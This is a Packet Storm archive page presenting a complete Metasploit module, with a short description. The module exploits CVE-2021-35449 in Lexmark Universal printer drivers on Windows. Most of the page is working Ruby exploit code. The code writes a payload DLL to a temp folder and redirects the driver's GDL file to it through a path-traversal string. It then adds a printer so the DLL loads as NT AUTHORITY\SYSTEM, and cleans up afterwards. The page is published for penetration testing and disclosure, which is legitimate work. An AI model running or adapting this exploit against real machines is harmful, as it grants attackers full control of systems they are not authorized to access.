exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Lexmark Driver Privilege Escalation

Lexmark Driver Privilege Escalation
Posted Aug 12, 2021
Authored by Jacob Baines, Shelby Pace, Grant Willcox | Site metasploit.com

Various Lexmark Universal Printer drivers as listed at advisory TE953 allow low-privileged authenticated users to elevate their privileges to SYSTEM on affected Windows systems by modifying the XML file at C:\ProgramData\<driver name>\Universal Color Laser.gdl to replace the DLL path to unires.dll with a malicious DLL path. When C:\Windows\System32\Printing_Admin_Scripts\en-US\prnmngr.vbs is then used to add the printer to the affected system, PrintIsolationHost.exe, a Windows process running as NT AUTHORITY\SYSTEM, will inspect the C:\ProgramData\<driver name>\Universal Color Laser.gdl file and will load the malicious DLL from the path specified in the file. This which will result in the malicious DLL executing as NT AUTHORITY\SYSTEM. Once this module is finished, it will use the prnmngr.vbs script to remove the printer it added.

tags | exploit
systems | windows
advisories | CVE-2021-35449
SHA-256 | db241e26cf8e485cbeaa7d359e18c68f4083f5cbe8615e284394323a682200d8

Lexmark Driver Privilege Escalation

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = NormalRanking

include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Post::Windows::Priv
include Msf::Exploit::FileDropper
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Lexmark Driver Privilege Escalation',
'Description' => %q{
Various Lexmark Universal Printer drivers as listed at advisory TE953
allow low-privileged authenicated users to elevate their privileges to
SYSTEM on affected Windows systems by modifying the XML file at
C:\ProgramData\<driver name>\Universal Color Laser.gdl
to replace the DLL path to unires.dll with a malicious DLL path.

When C:\Windows\System32\Printing_Admin_Scripts\en-US\prnmngr.vbs is
then used to add the printer to the affected system, PrintIsolationHost.exe,
a Windows process running as NT AUTHORITY\SYSTEM, will inspect the
C:\ProgramData\<driver name>\Universal Color Laser.gdl file and will
load the malicious DLL from the path specified in the file. This which will
result in the malicious DLL executing as NT AUTHORITY\SYSTEM.

Once this module is finished, it will use the prnmngr.vbs script
to remove the printer it added.
},
'License' => MSF_LICENSE,
'Author' => [
'Jacob Baines', # discovery, PoC, module
'Shelby Pace', # original Ricoh driver module
'Grant Willcox' # module
],
'References' =>
[
[ 'CVE', '2021-35449'],
[ 'URL', 'http://support.lexmark.com/index?page=content&id=TE953'],
[ 'URL', 'https://github.com/jacob-baines/concealed_position'],
[ 'URL', 'https://media.defcon.org/DEF%20CON%2029/DEF%20CON%2029%20presentations/Jacob%20Baines%20-%20Bring%20Your%20Own%20Print%20Driver%20Vulnerability.pdf']
],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'Targets' =>
[
[
'Windows', { 'Arch' => [ ARCH_X86, ARCH_X64 ] }
]
],
'Notes' =>
{
'SideEffects' => [ ARTIFACTS_ON_DISK ],
'Reliability' => [ REPEATABLE_SESSION ],
'Stability' => [ SERVICE_RESOURCE_LOSS ]
},
'DisclosureDate' => '2021-07-15',
'DefaultTarget' => 0
)
)
register_options(
[OptString.new('DRIVERNAME', [false, 'The name of the Lexmark driver to exploit', ''])]
)
self.needs_cleanup = true
end

# Check to see if a there are Lexmark drivers in the driver store.
# If there are, validate that they are similar to the ones we want
# to exploit. The user can specify the driver they'd like to exploit
# as option. Otherwise, the first vulnerable driver from the driver store
# will be selected.
def check
res = cmd_exec('pnputil.exe /enum-drivers')
m = res.scan(%r{Published Name: ([^.]*\.inf)\r\nOriginal Name: lmu.*?.inf\r\nProvider Name: Lexmark International\r\nClass Name: Printers\r\nClass GUID: {4d36e979-e325-11ce-bfc1-08002be10318}\r\nDriver Version: (\d+)/\d+/(\d+) \d+\.\d+\.\d+\.\d+}m)

return CheckCode::Safe('No Lexmark print drivers in the driver store') if m.empty?

# known vulnerable drivers
driver_list = ['Lexmark Universal v2', 'Lexmark Universal v2 XL', 'Lexmark Printer Software G2', 'Lexmark Printer Software G2 XL']
found_drivers = []

for path in m
print_status("Lexmark driver published at #{path[0]}")
inf_text = read_file("C:\\Windows\\inf\\#{path[0]}")
for driver in driver_list
if inf_text.include?(driver)
found_drivers.push(driver)
end
end
end

return CheckCode::Safe('None of the Lexmark drivers in the driver store are known to be vulnerable') if found_drivers.empty?

found_drivers = found_drivers.uniq
print_status("Found #{found_drivers.length} possible options:")
for driver in found_drivers
print_status("\t#{driver}")
end

# select driver to exploit
@drvr_name = datastore['DRIVERNAME']
if @drvr_name.empty?
@drvr_name = found_drivers[0]
print_status("No user provided DRIVERNAME. Defaulting to \"#{@drvr_name}\"")
else
return CheckCode::Safe('The user specified driver is not in the driver store') unless found_drivers.include?(@drvr_name)

print_status('The user selected driver was in the driver store')
end

@gdl_file = 'C:\\ProgramData\\' + @drvr_name + '\\Universal Color Laser.gdl'
CheckCode::Detected('A potentially vulnerable Lexmark print driver is available.')
end

def do_add_printer_vbs
script_cmd = "cscript \"#{@script_path}\" -a -p \"#{@printer_name}\" -m \"#{@drvr_name}\" -r \"lpt1:\""
print_status("Adding printer #{@printer_name}...")
cmd_exec(script_cmd)
end

def add_printer
fail_with(Failure::NotFound, 'Printer driver script not found') unless file?(@script_path)
fail_with(Failure::NotFound, 'No driver name set') if @drvr_name.empty?

# If the driver has never been installed, then the vulnerable file won't exist. So let's
# install once if necessary
if !file?(@gdl_file)
do_add_printer_vbs
cleanup
end

return CheckCode::Safe('No Lexmark GDL file found') unless file?(@gdl_file)

# dump exploit dll to disk
dll_data = generate_payload_dll
temp_path = expand_path('%TEMP%\\')
temp_path.concat(Rex::Text.rand_text_alpha(5..9))
temp_path.concat('.dll')
vprint_status("Writing dll to #{temp_path}")
write_file(temp_path, dll_data)
register_files_for_cleanup(temp_path)

# replace a DLL path to one in our control
traversal_path = '..\\..\\..\\..\\..\\..'
traversal_path.concat(temp_path[2..-1])
text = read_file(@gdl_file)
new_contents = text.gsub(/unires.dll/, traversal_path)
write_file(@gdl_file, new_contents)

# trigger exploitaiton
do_add_printer_vbs

# reset the path
text = read_file(@gdl_file)
new_contents = text.gsub(traversal_path, 'unires.dll')
write_file(@gdl_file, new_contents)
rescue Rex::Post::Meterpreter::RequestError => e
fail_with(Failure::Unknown, "#{e.class} #{e.message}")
end

def exploit
fail_with(Failure::None, 'Already running as SYSTEM') if is_system?

fail_with(Failure::None, 'Must have a Meterpreter session to run this module') unless session.type == 'meterpreter'

if sysinfo['Architecture'] != payload.arch.first
fail_with(Failure::BadConfig, 'The payload should use the same architecture as the target driver')
end

@printer_name = Rex::Text.rand_text_alpha(5..9)
@script_path = 'C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnmngr.vbs'
add_printer
end

def cleanup
print_status("Deleting printer #{@printer_name}")
delete_cmd = "cscript \"#{@script_path}\" -d -p \"#{@printer_name}\""
cmd_exec(delete_cmd)
end
end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close